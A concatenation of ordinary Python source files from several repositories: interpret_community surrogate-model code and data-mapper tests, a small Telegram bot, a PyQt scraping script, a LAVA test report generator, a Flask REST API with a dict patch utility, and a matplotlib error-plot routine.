teacher_y = np.column_stack((1 - teacher_y, teacher_y))
if is_classifier and teacher_y.shape[1] > 2:
# If more than two classes, use multiclass surrogate
multiclass = True
# For multiclass case, we need to train on the class label
training_labels = np.argmax(teacher_y, axis=1)
unique_labels = set(np.unique(training_labels))
if len(unique_labels) < teacher_y.shape[1]:
# Get the missing labels
missing_labels = set(range(teacher_y.shape[1])).difference(unique_labels)
# Append some rows with the missing labels
for missing_label in missing_labels:
# Find max prob for missing label
max_row_index = np.argmax(teacher_y[:, missing_label])
# Append the extra label to data and y value
training_labels = np.append(training_labels, missing_label)
if issparse(data) and not isspmatrix_csr(data):
data = data.tocsr()
vstack = sparse_vstack if issparse(data) else np.vstack
data = vstack([data, data[max_row_index:max_row_index + 1, :]])
surrogate_model = uninitialized_surrogate_model(multiclass=multiclass,
**explainable_model_args)
else:
surrogate_model = uninitialized_surrogate_model(**explainable_model_args)
if is_classifier and teacher_y.shape[1] == 2:
# Make sure output has only 1 dimension
teacher_y = teacher_y[:, 1]
# Transform to logit space and fit regression
surrogate_model.fit(data, _soft_logit(teacher_y))
else:
# Use hard labels for regression or multiclass case
if training_labels is None:
training_labels = teacher_y
surrogate_model.fit(data, training_labels)
return surrogate_model
```
#### File: test/raw_explain/test_data_mapper.py
```python
import numpy as np
import pytest
from scipy.sparse import issparse, csr_matrix
from sklearn.compose import ColumnTransformer
from sklearn.impute import SimpleImputer
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder
from interpret_community._internal.raw_explain import DataMapper
from raw_explain.utils import FuncTransformer, IdentityTransformer, SparseTransformer
from constants import owner_email_tools_and_ux
@pytest.mark.owner(email=owner_email_tools_and_ux)
@pytest.mark.usefixtures('clean_dir')
class TestDataMapper:
def setup_class(self):
self._identity_mapper_list = DataMapper([([0], IdentityTransformer()), ([1], IdentityTransformer())])
column_transformer = ColumnTransformer(
[("column1", IdentityTransformer(), [0]), ("column2", IdentityTransformer(), [1])]
)
x = np.ones((10, 5))
column_transformer.fit(x)
self._identity_mapper_column_transformer = DataMapper(column_transformer)
def _transform_numpy(self, dmapper):
x = np.ones((10, 5))
result = dmapper.transform(x)
assert result.shape == (10, 2)
def test_mixed_dtypes(self):
x = np.ones((10, 2))
data_mapper = DataMapper([([0], IdentityTransformer()), ([1], SparseTransformer())])
result = data_mapper.transform(x)
assert issparse(result)
def test_transform_sparse(self):
x = csr_matrix(np.zeros((10, 2)))
result = self._identity_mapper_list.transform(x)
assert result.shape == x.shape
assert issparse(result)
def test_column_with_brackets(self):
x = np.ones((2, 3))
x[0, 0] = 0
encoder = OneHotEncoder()
encoder.fit(x[0].reshape(-1, 1))
data_mapper = DataMapper([([0], encoder)])
result = data_mapper.transform(x)
assert result.shape == (2, 2)
def test_transform_numpy_list(self):
self._transform_numpy(self._identity_mapper_list)
def test_transform_numpy_column_transformer(self):
self._transform_numpy(self._identity_mapper_column_transformer)
def test_column_without_brackets(self):
data_mapper = DataMapper([(0, FuncTransformer(lambda x: x.reshape(-1, 1)))])
result = data_mapper.transform(np.ones((2, 3)))
assert np.all(result == [1, 1])
def test_column_with_none_transformer(self):
x = np.ones((2, 3))
data_mapper = DataMapper([(0, None)])
result = data_mapper.transform(x)
assert np.all(result == np.array([[1, 1]]))
def test_column_passthrough_column_transformer(self):
x = np.ones((2, 3))
column_transformer = ColumnTransformer([
("column0", "passthrough", [0])
])
column_transformer.fit(x)
data_mapper = DataMapper(column_transformer)
result = data_mapper.transform(x)
assert np.all(result == np.array([[1, 1]]))
def test_column_exception_without_brackets(self):
with pytest.raises(ValueError):
x = np.ones((2, 3))
x[0, 0] = 0
encoder = OneHotEncoder()
encoder.fit(x[0])
data_mapper = DataMapper([[0], encoder])
data_mapper.transform(x)
def test_pipeline_transform_list(self):
pipeline = Pipeline([("imputer", SimpleImputer()), ("onehotencoder", OneHotEncoder())])
x = np.ones((3, 2))
pipeline.fit(x)
data_mapper = DataMapper([([0, 1], pipeline)])
result = data_mapper.transform(x)
assert result.shape == (3, 2)
def test_pipeline_transform_column_transformer(self):
pipeline = Pipeline([("imputer", SimpleImputer()), ("onehotencoder", OneHotEncoder())])
x = np.ones((3, 2))
column_transformer = ColumnTransformer([
("column", pipeline, [0, 1])
])
column_transformer.fit(x)
data_mapper = DataMapper(column_transformer)
result = data_mapper.transform(x)
assert result.shape == (3, 2)
def test_many_to_many_exception_list(self):
# A transformer that takes input many columns. Since we do not recognize this transformer and it uses
# many input columns - it is treated as many to many/one map.
with pytest.raises(ValueError):
DataMapper([([0, 1], IdentityTransformer())])
def test_many_to_many_exception_column_transformer(self):
# A transformer that takes input many columns. Since we do not recognize this transformer and it uses
# many input columns - it is treated as many to many/one map.
with pytest.raises(ValueError):
column_transformer = ColumnTransformer([
("column_0_1", IdentityTransformer(), [0, 1])
])
x = np.ones((2, 2))
column_transformer.fit(x)
DataMapper(column_transformer)
def test_many_to_many_support_transformations(self):
# Instantiate data mapper with many to many transformer support and test whether the feature map is generated
column_transformer = ColumnTransformer([
("column_0_1_2_3", IdentityTransformer(), [0, 1, 2, 3]),
("column_4_5", OneHotEncoder(), [4, 5])
])
x = np.ones((10, 6))
# so that one hot encoder doesn't complain of only one category
x[0, 4] = 0
x[0, 5] = 0
column_transformer.fit(x)
data_mapper = DataMapper(column_transformer, allow_all_transformations=True)
data_mapper.transform(x)
# check feature mapper contents
feature_map_indices = [
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[4, 5],
[6, 7]
]
x_out = column_transformer.transform(x)
feature_map = np.zeros((x.shape[1], x_out.shape[1]))
num_rows = 0
for i, row in enumerate(feature_map_indices[:4]):
feature_map[i, row] = 0.25
num_rows += 1
for i, row in enumerate(feature_map_indices[4:], start=num_rows):
feature_map[i, row] = 1.0
assert (data_mapper.feature_map == feature_map).all()
``` |
{
"source": "jjohn114/red",
"score": 2
} |
#### File: jjohn114/red/bot.py
```python
import os
from configs import Config
from pyrogram import Client, filters, idle
from pyrogram.types import (
InlineKeyboardMarkup,
InlineKeyboardButton,
Message,
CallbackQuery,
)
app = Client(
api_id = Config.API_ID,
api_hash = Config.API_HASH,
bot_token = Config.BOT_TOKEN,
session_name = Config.SESSION_NAME
)
@app.on_message(filters.command("start"))
def start(app,msg):
app.send_message(msg.chat.id, "hello there")
@app.on_message(filters.command("help"))
def help(app,msg):
app.send_message(msg.chat.id, "How may i help you")
app.run() # Automatically start() and idle()
``` |
{
"source": "jjohn50/Python3-by-practice",
"score": 3
} |
#### File: 03 Regex/Parser using NLP/Web_scraping_Dynamic_Javascript_Scraping_DOES_NOT_WORK.py
```python
import sys
#QT is system arguments
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import QUrl
from PyQt5.QtWebEngineWidgets import QWebEnginePage
import bs4 as bs
import urllib.request
class Client(QWebPage):
def __init__(self,url):
self.app = QApplication(sys.argv)
#starting the application
QWebPage.__init__(self)
self.loadFinished.connect(self.on_page_load)
#connecting method when method is finished -> Could work directly with webpage object
self.mainFrame().load(QUrl(url))
self.app.exec_()
def on_page_load(self):
self.app.quit()
#just want it to load and nothing else
url = 'https://pythonprogramming.net/parsememcparseface/'
client_response = Client(url)
source = client_response.mainFrame().toHtml()
#get main frame and convert it to HTML
soup = bs.BeautifulSoup(source, 'lxml')
js_test = soup.find('p',class_='jstest')
#This lets parse paragraph tags with the class that contains jstest
print(js_test.text)
#This will print out the starting text
#sometime parsing a table will present no data
#The reason for this is that you are not a client so you will not get anything
# Need to download this pip3 install PyQt5
#I tried fixing the code that guy has. but it does not work any more
``` |
{
"source": "jjohnson-arm/mbl-tools",
"score": 2
} |
#### File: reports/lava/daily_report.py
```python
import lavaResultExtract as lRE
import sys
from os import environ
import argparse
from datetime import datetime
HELP_TEXT = """Lava daily report generator.
Requires the following environment variables to be set:
LAVA_SERVER - hostname of the server
LAVA_USER - username of login to server
LAVA_TOKEN - token used by username to login to server
REPORT_LINK - URL of Lava report generation script
"""
HTML_HEADER = """
<head>
<style>
body { background-color: black; }
table, th, td {
border:1px solid #669999;
border-collapse: collapse;
font-size: 1.3vw; /* Default size (jobs/tests) */
font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
padding:5px;
border-bottom:3px solid #669999;
background-color:#f2f2f2;
}
table { min-width: 100%; }
th { color:#353531; }
.backamber { background-color:#cc7a00; color:#fff; }
.backred { background-color:#8b0000; color:#fff; }
.backgreen { background-color:#006400; color:#fff; }
.backgrey { background-color:#808080; color:#fff; }
.textbuild { font-size: 2vw; } /* Build job header size */
.textboard { font-size: 0.9vw; } /* Board results size */
.texttime { float: right; font-size: 0.8vw; color:#fff }
.textkey { background-color:#000; color:#fff; font-size: 0.9vw; }
.textred { color: #e60000; text-align: right; }
.textamber { color: #e68a00; text-align: right; }
.textgreen { color: #009900; text-align: right; }
.textblack { color: #353531; text-align: right; }
.row { display: flex; }
.column { flex: 50%; }
a:link { text-decoration: none; color:#fff; }
a:visited { text-decoration: none; color:#fff; }
a:hover { text-decoration: underline; }
a:active { text-decoration: underline; }
</style>
</head>
<body>
"""
HTML_FOOTER = """
</body>
"""
MAX_RESULTS = 100
def get_relative_time(timestamp):
"""Given a timestamp string, get a relative time.
:return: Human readable relative time.
"""
dt = datetime.strptime(timestamp, "%Y%m%dT%H:%M:%S")
delta = datetime.now() - dt
days = delta.days
relative = ""
if days != 0:
relative = "{} day{} ago".format(days, ("" if days == 1 else "s"))
else:
mins = int(delta.seconds / 60)
if mins < 100:
relative = "{} min{} ago".format(mins, ("" if mins == 1 else "s"))
else:
hours = int(delta.seconds / 3600)
relative = "{} hour{} ago".format(
hours, ("" if hours == 1 else "s")
)
return relative
def get_results_summary(server, submitter, build_name, build_num=-1):
"""Get a summary of the jobs/tests for a build.
:return: Summary dictionary
"""
# Get test jobs for the given jenkins build_name
query = lRE.get_custom_query(
server, submitter, "{}_build{}".format(build_name, build_num)
)
results = server.results.make_custom_query("testjob", query, MAX_RESULTS)
build_num = query[query.rfind("build") + 5 :]
if len(results) > 0:
time = get_relative_time(results[0]["submit_time"].value)
else:
time = "never"
summary = {
"Name": build_name,
"Build": build_num,
"Totals": {},
"Boards": {},
"Time": time,
}
summary["Totals"] = {
"Jobs": len(results),
"Complete": 0,
"Pending": 0,
"Incomplete": 0,
"Suites": 0,
"Failed": 0,
"Passed": 0,
}
for result in results:
board = result["requested_device_type_id"]
if board not in summary["Boards"]:
summary["Boards"][board] = {
"Jobs": 0,
"Complete": 0,
"Pending": 0,
"Incomplete": 0,
"Suites": 0,
"Failed": 0,
"Passed": 0,
}
details = server.scheduler.job_details(result["id"])
if details["status"] == "Complete":
summary["Boards"][board]["Complete"] += 1
summary["Totals"]["Complete"] += 1
elif details["status"] in ["Incomplete", "Canceled"]:
summary["Boards"][board]["Incomplete"] += 1
summary["Totals"]["Incomplete"] += 1
else:
summary["Boards"][board]["Pending"] += 1
summary["Totals"]["Pending"] += 1
summary["Boards"][board]["Jobs"] += 1
suites = lRE.get_testjob_suites_list(server, result["id"])
for suite in suites:
numberOfTests = 0
numberOfPasses = 0
numberOfFails = 0
numberOfSkips = 0
if suite["name"] != "lava":
summary["Boards"][board]["Suites"] += 1
summary["Totals"]["Suites"] += 1
test_results = lRE.get_testsuite_results(
server, result["id"], suite["name"]
)
for item in test_results:
numberOfTests += 1
if item["result"] == "pass":
numberOfPasses += 1
elif item["result"] == "skip":
numberOfSkips += 1
elif item["result"] == "fail":
numberOfFails += 1
summary["Totals"]["Failed"] += numberOfFails
summary["Totals"]["Passed"] += numberOfPasses
summary["Boards"][board]["Failed"] += numberOfFails
summary["Boards"][board]["Passed"] += numberOfPasses
return summary
# List of indicators based for jobs, tests and overall
# Format for each list entry is:
# [{"Type": threshold ...}, [positive sym, negative sym, desc]]
INDICATORS = [
[{"Jobs": 0, "Tests": 0, "All": 0}, ["equals", "equals", "Same"]],
[{"Jobs": 1, "Tests": 2, "All": 5}, ["#8673", "#8675", "Trivial"]],
[{"Jobs": 3, "Tests": 5, "All": 10}, ["uArr", "dArr", "Minor"]],
[{"Jobs": 7, "Tests": 10, "All": 20}, ["#10506", "#10507", "Major"]],
[{"Jobs": 0, "Tests": 0, "All": 0}, ["#10224", "#10225", "Serious"]],
]
def get_indicator(value, last, prev):
"""Return an indicator of much different the last and prev results are.
:return: HTML symbol to indicate how much difference.
"""
if value in ["Complete", "Incomplete"]:
ind_type = "Jobs"
elif value in ["Passed", "Failed"]:
ind_type = "Tests"
else:
ind_type = "All"
diff = abs(last - prev)
index = 0 if last > prev else 1
for group in INDICATORS:
threshold = group[0][ind_type]
indicator = group[1][index]
if threshold >= diff:
break
# Return the last one found
return "&{};".format(indicator)
def indicator_key_table():
"""Print out a simple key table of indicators."""
print("<table><tr>")
for group in INDICATORS:
print(
'<td class="textkey">&{}; {}</td>'.format(group[1][0], group[1][2])
)
print("</tr></table>")
def compare_runs(runs, value, board=None):
"""Compare a value between runs and return indication of better/worse.
:return: HTML symbol to indicate status.
"""
if "Previous" in runs:
if board:
last = runs["Last"]["Boards"][board][value]
if board in runs["Previous"]["Boards"]:
prev = runs["Previous"]["Boards"][board][value]
else:
# Can't compare as board didn't get run last time
return ""
else:
last = runs["Last"]["Totals"][value]
prev = runs["Previous"]["Totals"][value]
return "{} ".format(get_indicator(value, last, prev))
else:
return ""
def choose_class(result, zero_class, nonz_class):
"""Return one of the classes based on the result.
:return: zero_class when zero result, else nonz_class
"""
if result == 0:
return zero_class
else:
return nonz_class
def get_result_class_and_string(runs, value, board=None):
"""Get a class based on value & the result with comparison indicator.
:return: Tuple of class - zero_class when zero result, else nonz_class,
and String with status indicator for HTML.
"""
if board:
result = runs["Last"]["Boards"][board][value]
else:
result = runs["Last"]["Totals"][value]
if value in ["Complete", "Passed"]:
clss = choose_class(result, "textblack", "textgreen")
elif value in ["Incomplete", "Failed"]:
clss = choose_class(result, "textblack", "textred")
else:
clss = "textamber"
result = "{}{}".format(compare_runs(runs, value, board), result)
return (clss, result)
# How much complete/incomplete jobs are worth compared to passed/failed tests
JOBS_FACTOR = 5
def calculate_overall(totals):
"""Get an overall value from a dictionary of run totals.
:return: Overall value.
"""
result = totals["Complete"] - totals["Incomplete"]
result *= JOBS_FACTOR
result += totals["Passed"] - totals["Failed"]
return result
def get_result_overall_class_and_string(runs):
"""Get a class based on value & the result with comparison indicator.
:return: Tuple of class and String with status indicator for HTML.
"""
totals = runs["Last"]["Totals"]
if "Previous" in runs:
last = calculate_overall(totals)
prev = calculate_overall(runs["Previous"]["Totals"])
indicator = " {}".format(get_indicator("All", last, prev))
else:
last = 0
prev = 0
indicator = ""
if totals["Jobs"] > 0:
if totals["Incomplete"] == 0 and totals["Failed"] == 0:
# Complete success!
backclass = "backgreen"
elif last < prev:
# Things are getting worse!
backclass = "backred"
else:
# Still some problems, but probably getting better.
backclass = "backamber"
else:
# Nothing ran
backclass = "backgrey"
return (backclass, indicator)
def html_output(results, link, submitter):
"""Print out all the summary results in HTML tables."""
print(HTML_HEADER)
print('<div class="row">')
half = int((len(results) + 1) / 2)
count = 0
print('<div class="column">')
for runs in results:
result = runs["Last"]
# Put half the jobs in one column and the others in another
if count == half:
print("</div>") # Finish the col
print('<div class="column">')
count += 1
# Work out the heading colour based on results
(backclass, indicator) = get_result_overall_class_and_string(runs)
# Quick link to the detailed results
anchor = "{}?image_version={}&image_number={}&submitter={}".format(
link, result["Name"], result["Build"], submitter
)
# Start the table with a main job name heading
print("<table><tr>")
header = '<span class="textbuild"><a href="{}">{} build{}</a></span>'.format( # noqa: E501
anchor, result["Name"], result["Build"]
)
header = '{}{}<span class="texttime">{}</span>'.format(
header, indicator, result["Time"]
)
print('<th class="{}" colspan="5">{}</th>'.format(backclass, header))
print("</tr><tr>")
# Indicate there are still jobs pending
if result["Totals"]["Pending"] > 0:
print("<th>Jobs (pending)</th>")
span = "1"
else:
if (
"Previous" in runs
and runs["Previous"]["Totals"]["Pending"] > 0
):
print("<th>Jobs (previous pends)</th>")
span = "1"
else:
print("<th>Jobs</th>")
span = "2"
if span == "1":
print(
'<td class="{}">{}</td>'.format(
*get_result_class_and_string(runs, "Pending")
)
)
# Overall job stats
print(
'<td colspan="{}" class="{}">{}</td>'.format(
span, *get_result_class_and_string(runs, "Complete")
)
)
print(
'<td colspan="2" class="{}">{}</td>'.format(
*get_result_class_and_string(runs, "Incomplete")
)
)
print("</tr><tr>")
# Overall test stats
print("<th>Tests</th>")
print(
'<td colspan="2" class="{}">{}</td>'.format(
*get_result_class_and_string(runs, "Passed")
)
)
print(
'<td colspan="2" class="{}">{}</td>'.format(
*get_result_class_and_string(runs, "Failed")
)
)
# Per board stats
for board, info in result["Boards"].items():
print("</tr><tr>")
print('<th class="textboard">{} (jobs/tests)</th>'.format(board))
print(
'<td class="textboard {}">{}</td>'.format(
*get_result_class_and_string(runs, "Complete", board)
)
)
print(
'<td class="textboard {}">{}</td>'.format(
*get_result_class_and_string(runs, "Incomplete", board)
)
)
print(
'<td class="textboard {}">{}</td>'.format(
*get_result_class_and_string(runs, "Passed", board)
)
)
print(
'<td class="textboard {}">{}</td>'.format(
*get_result_class_and_string(runs, "Failed", board)
)
)
print("</tr></table>")
indicator_key_table()
print("</div>") # Finish the col
print("</div>") # Finish the row
print(HTML_FOOTER)
def main():
"""Create the daily report."""
parser = argparse.ArgumentParser(
description=HELP_TEXT, formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument(
"--submitter",
type=str,
default="mbl",
nargs=None,
help="Submitter (default: mbl)",
)
parser.add_argument(
"build_name", nargs="+", help="List of build names from jenkins"
)
args = parser.parse_args()
try:
server = lRE.connect_to_server(
environ["LAVA_SERVER"], environ["LAVA_USER"], environ["LAVA_TOKEN"]
)
link = environ["REPORT_LINK"]
except KeyError as key:
print("ERROR: unset environment variable - {}".format(key))
exit(2)
results = []
for build in args.build_name:
runs = {}
runs["Last"] = get_results_summary(server, args.submitter, build)
if runs["Last"]["Build"]:
build_num = int(runs["Last"]["Build"]) - 1
if build_num > 0:
runs["Previous"] = get_results_summary(
server, args.submitter, build, build_num
)
results.append(runs)
html_output(results, link, args.submitter)
if __name__ == "__main__":
sys.exit(main())
``` |
{
"source": "jjojala/results",
"score": 2
} |
#### File: server/rest/community.py
```python
from flask import request
from flask_restful import Resource, reqparse
from .notification import CREATED, UPDATED, PATCHED, REMOVED
import rest.timeservice as timeservice
from util.patch import patch, PatchConflict
communities = [
]
_NOTIFICATION_ARG = "notifications"
_API_ARG = "api"
_TYPE = "Community"
class Communities(Resource):
def makeArgs(notifications, api):
return {
_NOTIFICATION_ARG: notifications,
_API_ARG: api }
def __init__(self, **kwargs):
self._notifications = kwargs[_NOTIFICATION_ARG]
self._api = kwargs[_API_ARG]
@timeservice.time_service
def get(self):
return communities, 200
class Community(Resource):
def makeArgs(notifications, api):
return {
_NOTIFICATION_ARG: notifications,
_API_ARG: api }
def __init__(self, **kwargs):
self._notifications = kwargs[_NOTIFICATION_ARG]
self._api = kwargs[_API_ARG]
@timeservice.time_service
def get(self, id):
for i in communities:
if (id == i["id"]):
return i, 200
return "{} with id {} not found".format(_TYPE, id), 404
@timeservice.time_service
def post(self, id):
parser = reqparse.RequestParser()
parser.add_argument("name")
parser.add_argument("abbr")
args = parser.parse_args()
for i in communities:
if (id == i["id"]):
return "{} with id {} already exists".format(
_TYPE, id), 409
community = {
"id": id,
"name": args["name"],
"abbr": args["abbr"]
}
communities.append(community)
self._notifications.submit(CREATED, _TYPE, community)
return community, 201, { 'Location': self._api + id }
@timeservice.time_service
def put(self, id):
parser = reqparse.RequestParser()
parser.add_argument("name")
parser.add_argument("abbr")
args = parser.parse_args()
for i in communities:
if (id == i["id"]):
i["name"] = args["name"]
i["abbr"] = args["abbr"]
self._notifications.submit(UPDATED, _TYPE, i)
return i, 200
return "{} with id {} not found".format(_TYPE, id), 404
@timeservice.time_service
def delete(self, id):
global communities
new = [i for i in communities if i["id"] != id]
if (len(new) < len(communities)):
communities = new
self._notifications.submit(REMOVED, _TYPE, id)
return "{} is deleted.".format(id), 200
return "{} with id {} not found".format(_TYPE, id), 404
@timeservice.time_service
def patch(self, id):
diff = request.json
# TODO: explicitly lock the item
for i in communities:
if (id == i["id"]):
try:
patched = patch(i, diff)
i["name"] = patched["name"]
i["abbr"] = patched["abbr"]
self._notifications.submit(PATCHED, _TYPE, diff)
return i, 200
except PatchConflict as ex:
return "Patching {} with id {} failed: {}".format(
_TYPE, id, str(ex)), 409
return "{} with id {} not found".format(_TYPE, id), 404
```
#### File: server/rest/notification.py
```python
from flask_socketio import SocketIO, Namespace
CREATED = 'CREATED'
UPDATED = 'UPDATED'
PATCHED = 'PATCHED'
REMOVED = 'REMOVED'
class Notifications(Namespace):
def __init__(self, namespace, socketio):
super(Notifications, self).__init__(namespace)
self._socketio = socketio
def submit(self, event, entity, data):
notification = {
'event': event + ' ' + entity,
'data': data
}
self._socketio.emit('notification', notification, namespace='/api/notifications')
def on_connect(self):
print("on_connect()")
def on_disconnect(self):
print("on_disconnect()")
def on_notification(self, data):
print("on_notification(data={})".format(data))
```
#### File: server/util/patch.py
```python
import copy
class PatchConflict(Exception):
def __init__(self, key, expected, actual):
self._msg = "Conflict in attribute \'{}\': expecting \'{}\' but got \'{}\'".format(key, expected, actual)
def __str__(self):
return self._msg
def diff(a, b):
"""Get a diff -object of 'a' to 'b'
Given, the a and b..
a = { "id": 1, name:"<NAME>", args: [ 1, 2 ] }
b = { "id": 2, name:"<NAME>", args: [ 2, 3 ] }
.. the diff is:
diff(a, b) = {
"name": [ "<NAME>", "<NAME>" ],
"args": [ [ 1, 2 ], [ 2, 3 ] ]
}
If the two objects have no difference, then an empty
object "{}" will be returned.
"""
def diff_value(value_a, value_b):
if (value_a == value_b):
return None
if (value_a == None or value_b == None):
return [value_a, value_b]
if (isinstance(value_a, dict)):
return diff_dict(value_a, value_b)
return [value_a, value_b]
def diff_dict(dict_a, dict_b):
d = {}
for key,val in dict_a.items():
c = diff(val, dict_b[key])
if (c != None):
d[key] = c
return d
if (isinstance(a, dict)):
return diff_dict(a, b)
return diff_value(a, b)
def patch(target, diff, key=None):
"""Patch object target with diff-object and return a new, patched object.
The 'diff' must apply the rules of an diff-object briefly described
with the diff() function.
"""
def patch_value(k, t, c):
if (t == c[0]):
return c[1]
raise PatchConflict(k, c[0], t)
def patch_dict(k, t, d):
r = {} # result
for k,v in t.items(): # for 'key','value:' in 'target'
if (k in d.keys()): # if 'diff' contains 'key'
r[k] = patch(v, d[k], k)
else:
r[k] = copy.deepcopy(t[k]) # no 'change' so copy as such
return r
if (isinstance(diff, dict)):
return patch_dict(key, target, diff)
return patch_value(key, target, diff)
``` |
{
"source": "jjokella/pyshemkf",
"score": 2
} |
#### File: scripts/errorplot/plot.py
```python
from matplotlib import colors
import numpy as np
import matplotlib.pyplot as plt
from pskf.tools.run import pythonmodule as pm
from pskf.tools.plot import plotarrays as pa
from pskf.scripts.errorplot import arrays as ea
###############################################################################
# Errorplot RMSE point plot #
###############################################################################
def plot(
ax,
which_methods=[0, 1, 2, 3, 4, 5, 6],
which_res='endres',
stat_method='mean',
ensemble_sizes=[50, 70, 100, 250],
axistitle='',
model='wavebc',
is_std=False,
lineyval=0.62,
std_method='std',
pic_format='pdf',
figpos=[0.15, 0.3, 0.8, 0.6],
xlim_min=0,
xlim_max=None,
ylims=[0.28, 0.82],
is_textpos_auto=True,
textpos=[0.7, 0.6, 0.5, 0.4],
xdiff_nens=0.5,
yticks=[0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1],
ylabel=r'RMSE $\log(K[\mathrm{m}^2])$',
num_pack=4, # Number of methods in pack
is_text=False,
text_x=0.5,
text_y=0.5,
n_syn=1000,
legend_input=None,
formatsos=['o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p',
'o', 'v', 's', 'p'],
coleros=[(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(0.0, 0.0, 0.0), (0.0, 0.0, 0.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0),
(1.0, 1.0, 1.0), (1.0, 1.0, 1.0)],
markersize=[10 for i in range(32)],
markeredgesize=1.5,
fontleg=30,
fonttit=40,
fontlab=40,
fonttic=30,
):
"""
A plotting function for statistics of residual distributions.
Parameters
----------
ax : Axes
The axes to draw to.
which_methods : array int
Array of integers containing the method specifiers
from module plotarrays.
The methods appear in the plot in this order.
which_res : string
'endres' - use residuals after EnKF run
'begres' - use residuals before EnKF run
stat_method : string
'mean' - Means
'std' - Standard deviation
'stdm' - Standard deviation of the mean
'median' - Median or 50 Percentile
'q25' - 25 Percentile
'q75' - 75 Percentile
ensemble_sizes : array of integers
array can typically contain 50, 70, 100, 250,
500, 1000, 2000
model : string
'wavebc' - Model wavebc
'wave' - Model wave
is_std : boolean
True - Show errorbars of standard deviation
False - No errorbars
std_method : string
Standard deviation to use
'std' - Standard deviation
'stdm' - Standard deviation of mean
pic_format : string
Format of the picture
'pdf' - pdf-format
'eps' - eps-format
'png' - png-format
'jpg' - jpg-format
'svg' - svg-format
figpos : array of floats
Four numbers
xbeg, ybeg, xrange, yrange
More input specifying plot parameters.
Returns
-------
ax : Axes
Axes containing plot.
pic_name : string
Containing proposed saving location for Figure.
"""
# Check
for enssize in ensemble_sizes:
if enssize not in [50, 70, 100, 250, 500, 1000, 2000]:
raise RuntimeError(
'Wrong ensemble size.'
)
# Title
ax.set_title(axistitle, size=fonttit)
# Number of methods
num_methods = len(which_methods)
# Default legend input
if legend_input is None:
legend_input = pa.longnames_methods
legend_input = np.array([legend_input[i].ljust(18)
for i in which_methods])
# Load residuals
res = np.load(pm.py_output_filename(
'errorplot',
which_res,
stat_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy'
))
# Load standard deviation
if is_std:
std = np.load(pm.py_output_filename(
'errorplot',
which_res,
std_method+'_'+model+'_'
+ '_'.join([str(enssize) for enssize in ensemble_sizes])+'_'
+ '_'.join([str(i) for i in which_methods]),
'npy'))
ax.set_prop_cycle("color", ['k'])
ax.set_position(figpos)
for iens, enssize in enumerate(ensemble_sizes):
# x positions, up to 15 methods
x = np.delete(np.arange(0, 100),
np.arange(0, 100, num_pack+1))
# Skip one after num_pack+1 entries for vertical line
resplot = res[:, iens]
if is_std:
stdplot = std[:, iens]
# Plot
puntos = [] # Contains plotted points
ax.plot(x[:len(resplot)], resplot, 'k-', label=3)
for iplot in range(num_methods):
# Points
punto, = ax.plot(
x[iplot],
resplot[iplot],
formatsos[iplot],
lw=2,
ms=markersize[iplot],
label=legend_input[iplot],
c=coleros[iplot], mew=markeredgesize,
mec='black'
)
puntos.append(punto)
# Text
if iplot == num_methods-1:
ax.text(
x[iplot]+xdiff_nens,
resplot[iplot] if is_textpos_auto else textpos[iens],
r'$n_{e}$='+str(enssize),
verticalalignment='center',
horizontalalignment='left',
size=20,
)
# Error
if is_std:
ax.errorbar(
x[iplot],
resplot[iplot],
yerr=stdplot[iplot],
fmt=formatsos[iplot],
lw=2,
ms=markersize[iplot],
label='this',
mfc=coleros[iplot],
mew=markeredgesize,
mec='black'
)
# Legend
num_inleg = num_pack # Methods per legend (except last)
num_legs = int(num_methods/num_inleg
+ int(bool(np.mod(num_methods,
num_inleg)))) # Number of legends
num_inlastleg = (np.mod(num_methods, num_inleg)
if np.mod(num_methods, num_inleg) else
num_inleg) # Methods in last legend
leginds = [num_inleg-1+i*num_inleg
if i < num_legs-1 else
num_inleg-1+(i-1)*num_inleg+num_inlastleg
for i in range(num_legs)] # last method ind in each legend
legranges = [num_inleg if i < num_legs-1 else num_inlastleg
for i in range(num_legs)] # Methods in each legend
for ileg in range(num_legs):
xleg = figpos[0] + ileg*figpos[2]/num_legs
my_legend = ax.legend(
handles=[puntos[i]
for i in range(leginds[ileg]-legranges[ileg]+1,
leginds[ileg]+1)],
bbox_to_anchor=[xleg,
0.00,
figpos[2]/num_legs,
0.3],
bbox_transform=plt.gcf().transFigure,
# loc=[0.0, 1.0],
mode='expand',
# labelspacing=1.0,
ncol=1,
numpoints=1,
fontsize=fontleg,
framealpha=1.0,
markerscale=1.0
)
ax.add_artist(my_legend)
# Lines
for xline in range(0, 100, num_pack+1):
ax.vlines(xline, 0.0, 1.0, linestyles='dotted')
for yline in yticks:
ax.hlines(yline, 0, 100, linestyles='dotted')
ax.hlines(lineyval, 0, 100, linestyles='dashed')
# Text: Model name and n_syn in box
if is_text:
model_spec = ' Tracer ' if model == 'wavereal' else ' Well '
ax.text(
text_x, text_y,
model_spec+'\n'
+ r' $n_{syn}$: '+str(n_syn).rjust(4),
linespacing=1.5,
fontsize=30,
bbox={'facecolor': (0.8, 0.8, 0.8), 'alpha': 1.0, 'pad': 10},
)
# Style
